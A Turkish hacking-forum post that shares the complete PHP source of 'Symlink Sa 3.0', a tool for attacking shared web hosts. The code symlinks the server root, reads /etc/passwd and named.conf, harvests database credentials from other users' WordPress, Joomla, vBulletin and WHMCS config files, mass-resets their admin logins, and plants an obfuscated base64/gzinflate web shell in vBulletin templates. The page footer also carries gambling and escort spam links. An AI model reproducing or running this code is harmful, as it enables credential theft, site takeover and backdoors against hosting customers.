Konu Bilgileri
Konu: Symlink sa 3.0 Priv8 Tutorial (Cod3d by S3n4t00r) Yazar: kr4lkurt
Okunma: 660 Yorum: 1
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
[Resim: 28jji48.png]

Symlink Sa 3.0 Neler Yeni?

- Symlink Bypass Eklendi
- Bypass Okuma
- Toplu Joomla Symlink
- Toplu WordPress Symlink
- Toplu vBulletin Symlink

Kod:
<?php


/*

 .d8888. d88888b  .o88b.         db   d8b   db      .o88b.  .d88b.  .88b  d88.
 88'  YP 88'     d8P  Y8         88   I8I   88     d8P  Y8 .8P  Y8. 88-YbdP`88
 `8bo.   88ooooo 8P              88   I8I   88     8P      88    88 88  88  88
   `Y8b. 88~~~~~ 8b      C8888D  Y8   I8I   88     8b      88    88 88  88  88
 db   8D 88.     Y8b  d8         `8b d8-8b d8' db  Y8b  d8 `8b  d8' 88  88  88
 `8888Y' Y88888P  `Y88P'          `8b8' `8d8'  VP   `Y88P'  `Y88P'  YP  YP  YP


  author..............: s3n4t00r
  home................: sec-w.com
  twitter.............: @[URL="https://www.turkhackteam.org/member.php?u=513435"]S3n[/URL]4t00r
  name tools..........: Symlink Sa v3.0

*/



set_time_limit(0);
error_reporting(0);


$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );

$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
$u = explode("/",$pageFTP );
$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );

?>
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Symlink_Sa 3.0</title>
<script type="text/javascript" language="javascript">
<!--
ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}********.write(OT);
// --></script>
<style type="text/css">

 html,body {
    margin: 0;
    padding: 0;
    outline: 0;
}
a{

font-size: 13px;

}


body {
   direction: ltr;
   background-color:#F4F4F4;
   color: rgb(153, 153, 153);
   text-align: center
}



input,textarea,select{
font-weight: bold;
color: #000000;
}

input,textarea,select:hover{
box-shadow: 0px 0px 4px #AAAAAA;
}


.hedr {
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 22px;


}

.cont a{

text-decoration: none;
color:rgb(153, 153, 153);
font-family: Tahoma, Arial, sans-serif  ;
font-size: 16px;
text-shadow: 0px 0px 3px ;
}

.cont a:hover{


 color: #EEEEEE ;
 text-shadow:0px 0px 3px #000000 ;


}

.tmp tr td{

border: solid 1px #BBBBBB;

padding: 2px ;
 font-size: 13px;
}

.tmp tr td a {
 text-decoration: none;



}

.foter{
 font-size: 9pt;
 color: #AAAAAA ;
 text-align: center
}

.tmp tr td:hover{

box-shadow: 0px 0px 4px #888888;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

 font-size: 11pt;
}
.for a : hover{

text-shadow: 0px 0px 1px #3366FF;

}


.ir {
 color: #FF0000;
}



</style>

</head>

<body>

<div class='all'>


<?php

@mkdir('sym',0777);
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);


@[URL="https://www.turkhackteam.org/member.php?u=606963"]Symlink[/URL]("/","sym/root");

$pg = basename(__FILE__);

echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;

echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;

echo '<div class="cont">

[<a href="?"> Home </a>]

[<a href="?sws=sym"> User & Domains & Symlink </a>]

[<a href="?sws=sec"> Domains & Script </a>]

[ <a href="?sws=file"> Symlink File </a>]

[<a href="?sws=passwd"> Symlink Bypass </a>]

<br /><br />

[ <a href="?sws=read"> Bypass Read </a>]

[ <a href="?sws=joomla"> Mass Joomla </a>]

[ <a href="?sws=wp"> Mass WordPress </a>]

[ <a href="?sws=vb"> Mass vBulletin </a>]

[ <a href="?sws=help"> Help </a>]

<br /><br /><br />






</div>';

if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{





/// Domains + Scripts  ///

case 'sec':

if(!@is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

               die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($d00m as $dom){

flush();
flush();



if(eregi("zone",$dom)){
@[URL="https://www.turkhackteam.org/member.php?u=293058"]pre[/URL]g_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(@strlen(trim($domsws[1][0])) > 2){

$user = @[URL="https://www.turkhackteam.org/member.php?u=628396"]Posi[/URL]x_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];

///////////////////////////////

$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];


$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];

////////////////////////////////

$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];

$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];

$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];

/////////////////

$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2= @get_headers($wh1);
$wh=$whh2[0];

$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2= @get_headers($wh2);
$wh12=$whh2[0];

$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3= @get_headers($wh3);
$wh13=$whh3[0];

$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5= @get_headers($wh5);
$wh15=$whh5[0];

$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4= @get_headers($wh4);
$wh14=$whh4[0];



////////////////////////////////////////////////////////////////////////////////

////////// Wordpress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
$config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
 $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}

///////////WHMCS////////

elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
{
 $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";

}
elseif (strpos($wh12, "200")  == true)
{
 $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
}

elseif (strpos($wh13, "200")  == true)
{
 $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";

}

///////// Joomla to 4 ///////////

elseif (strpos($jo, "200")  == true)
{
 $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
}

elseif (strpos($jo12, "200")  == true)
{
 $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
}

//////////vBulletin to 4 ///////////

elseif (strpos($vb, "200")  == true)
{
 $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb12, "200")  == true)
{
 $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb13, "200")  == true)
{
 $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
}

else
{
continue;
}
flush();
flush();

/////////////////////////////////////////////////////////////////////////////////////



$site = $user['name'] ;



flush();

echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
<td>".$config."</td></tr>"; flush();

}
}
}
}




break;


/// user + domine + symlink  ///

case 'sym':

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

               die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

flush();



$site = $user['name'] ;

@[URL="https://www.turkhackteam.org/member.php?u=606963"]Symlink[/URL]("/","sym/root");

$site = $domsws[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}


echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>


<td>
".$user['name']."
</td>






<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>


</tr></div> ";


flush();
flush();

}
}
}
}




break;


/// file  symlink ///

case 'file':

echo'
The file path to symlink

<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />



</form>
';

$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];

if ($symlink)
{


@mkdir('sym1',0777);
$c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$f =@fopen ('sym1/.htaccess','w');
@fwrite($f , $c);
@[URL="https://www.turkhackteam.org/member.php?u=606963"]Symlink[/URL]("$pfile","sym1/$symfile");

echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';

}



break;

/// bypass read

case 'read':

echo "read /etc/named.conf";
echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
flush();
flush();


$file = '/etc/named.conf';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
else if (!$r3ad)
{
$r3ad = @[URL="https://www.turkhackteam.org/member.php?u=77219"]show[/URL]_source($file) ;
}
else if (!$r3ad)
{
$r3ad = @highlight_file($file);
}
else if (!$r3ad)
{
$sm = @[URL="https://www.turkhackteam.org/member.php?u=606963"]Symlink[/URL]($file,'sym.txt');


if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";

}
}



echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";


if(isset($_GET['save'])){


$cont = stripcslashes($_POST['file']);

$f = fopen('named.txt','w');

$w = fwrite($f,$cont);

                 if($w){

                 echo '<br />save has been successfully';

                 }

fclose($f);




}



break;

// passwd

case 'passwd':

if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){


$cont = stripcslashes($_POST['file']);

if(!file_exists('passwd.txt')){

$f = @fopen('passwd.txt','w');

$w = @fwrite($f,$cont);

fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
// * SHOW * //

echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
flush();

$fil3 = file('passwd.txt');

foreach ($fil3 as $f){

    $u=explode(':', $f);
    $user = $u['0'];



echo "
<tr>



<td width='15%'>
$user
</td>






<td width='10%'>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>

<td width='10%'>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>



</tr></div> ";


flush();
flush();


}






die ("</tr></div>");


                 }





}



echo "read /etc/passwd";
echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
flush();

$file = '/etc/passwd';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
elseif(!$r3ad)
{
$r3ad = @[URL="https://www.turkhackteam.org/member.php?u=77219"]show[/URL]_source($file) ;
}
elseif(!$r3ad)
{
$r3ad = @highlight_file($file);
}
elseif(!$r3ad)
{

                                           for($uid=0;$uid<1000;$uid++){
                                            $ara = posix_getpwuid($uid);
                                              if (!empty($ara)) {
                                                 while (list ($key, $val) = each($ara)){
                                                   print "$val:";
                                                 }
                                                 print "\n";
                                                }

                                       }

}


flush();


echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
flush();

break;



case 'joomla':

/////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////


if(isset($_POST['s'])){

$file = @file_get_contents('joomla.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('JConfig',$readconfig)){



$pass    =  ex($readconfig,'$password = \'',"';");

$userdb  =  ex($readconfig,'$user = \'',"';");

$db      =  ex($readconfig,'$db = \'',"';");

$fix     =  ex($readconfig,'$dbprefix = \'',"';");

$tab     =  $fix.'users';


$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");


$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");


if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
flush();



}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
flush();

}

}









die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

flush();


}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

               die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=joomla'>
<input type='submit' value='Mass ching Admin' />
<input type='hidden' value='1' name='s' />
</form><br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('joomla.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


////////// joomla ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
$config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
 $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
 $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}


break;

case 'wp':

############################ index #########################3






########  admin ##########33

if(isset($_POST['s'])){

$file = @file_get_contents('wp.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('wp-settings.php',$readconfig)){



$pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");

$userdb  =  ex($readconfig,"define('DB_USER', '","');");

$db      =  ex($readconfig,"define('DB_NAME', '","');");

$fix     =  ex($readconfig,'$table_prefix  = \'',"';");

$tab     = $fix.'users';

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;

$query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;



if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";

flush();
flush();






}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";

flush();
flush();

}

}










die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

               die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=wp'>
<input type='submit' value='Mass Change Admin' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

flush();
flush();

$f = fopen('wp.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


////////// wp ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
$config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
 $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
 $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
flush();





flush();


}
}
}
}


break;


case 'vb':


if(isset($_POST['s'])){



$file = @file_get_contents('vb.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('vBulletin',$readconfig)){



$db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");

$userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");

$pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;

$crypt  = "{\${eval(gzinflate(base64_decode(\'";

$crypt .= "$shell";

$crypt .= "\')))}}{\${exit()}}</textarea>";

$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;

$query  = @mysql_query($sqlfaq,$con);



if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";







}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
}

}










die();

}

if(!is_file('named.txt')){

$d00m = file("/etc/named.conf");

}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

               die ("<**** http-equiv='*******' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=vb'>
<input type='submit' value='Inject shell' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('vb.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


////////// vb ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
$config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
 $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
 $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}








break;

case 'help':

echo "<div class='tmp'>
<table align='center' width='40%'><td>function</td><td>Case</td>";


$safe_mode = ini_get('safe_mode');
    if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Safe Mode</td><td>$r</td>";

$fun = function_exists('symlink');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function symlink</td><td>$r</td>";


$fun = function_exists('file');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file</td><td>$r</td>";

$fun = function_exists('file_get_contents');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file_get_contents</td><td>$r</td>";

$fun = function_exists('mkdir');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function mkdir</td><td>$r</td>";


$fun = is_dir('sym/root');
    if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Permission denied</td><td>$r</td>";


$fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
    if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}

echo "<tr><td>Forbidden</td><td>$r</td>";




echo "</table></div>";



break;
default:
header("********: $pg");




}


/// home ///
}else
{


echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
   if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
   else { echo '<br /><br />Not uploaded !!<br><br>'; }


}

   echo '
<br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
<br /><br />
<b style="color: red";>   Sec-w.Com  </b>
<br /><br />
Muslims Hackers</div> ';

}


function ex($text,$a,$b){
$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}



echo '</div>

<a style="text-decoration: none; color: #F4F4F4;" title="اÙ„Ø*Ù…اÙÅ Ù‡"/href="http://sec-w.com/cc">اÙ„Ø*Ù…اÙÅ Ù‡</a>

<a style="text-decoration: none; color: #F4F4F4;" title="عالم اÙ„Ø*Ù…اÙÅ Ù‡"/href="http://sec-w.com/cc">عالم اÙ„Ø*Ù…اÙÅ Ù‡</a>



</body>

</html>
';

?>
Ara
Cevapla
#2
2018 sw pek geçmez ama sunucuyada bağlı paylaşım için teşekkürler
sid3sblog.wordpress.com
Herkes görmek istediğini görür
Cevapla


Symlink sa 3.0 Priv8 Tutorial (Cod3d by S3n4t00r) Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  hack script arşivi,sheller,exploitler,symlink,sql Ens4R 675 172,720 21.06.2022, Saat:18:16
Son Yorum: éManuella
  Priv8 CageFS Bypass Kzsg 42 15,417 06.03.2022, Saat:02:25
Son Yorum: ByLorex
  Priv8 sql scanner php kesin çalışıyo :) G3nzo 51 22,559 28.10.2021, Saat:18:06
Son Yorum: elcinmandrakona
  Miyachung BackConnect Shell Priv8 Kzsg 5 5,353 28.10.2021, Saat:17:55
Son Yorum: elcinmandrakona
  Priv8 Bypass Kzsg 22 8,575 08.07.2020, Saat:17:12
Son Yorum: Yoono


tipobet canlı bahis siteleri bonus veren siteler canlı bahis bahis siteleri deneme bonusu veren siteler deneme bonusu bahis siteleri casino siteleri bahis siteleri deneme bonusu bodrum escort kuşadası escort konya escort anadolu yakası escort bodrum escort izmit escort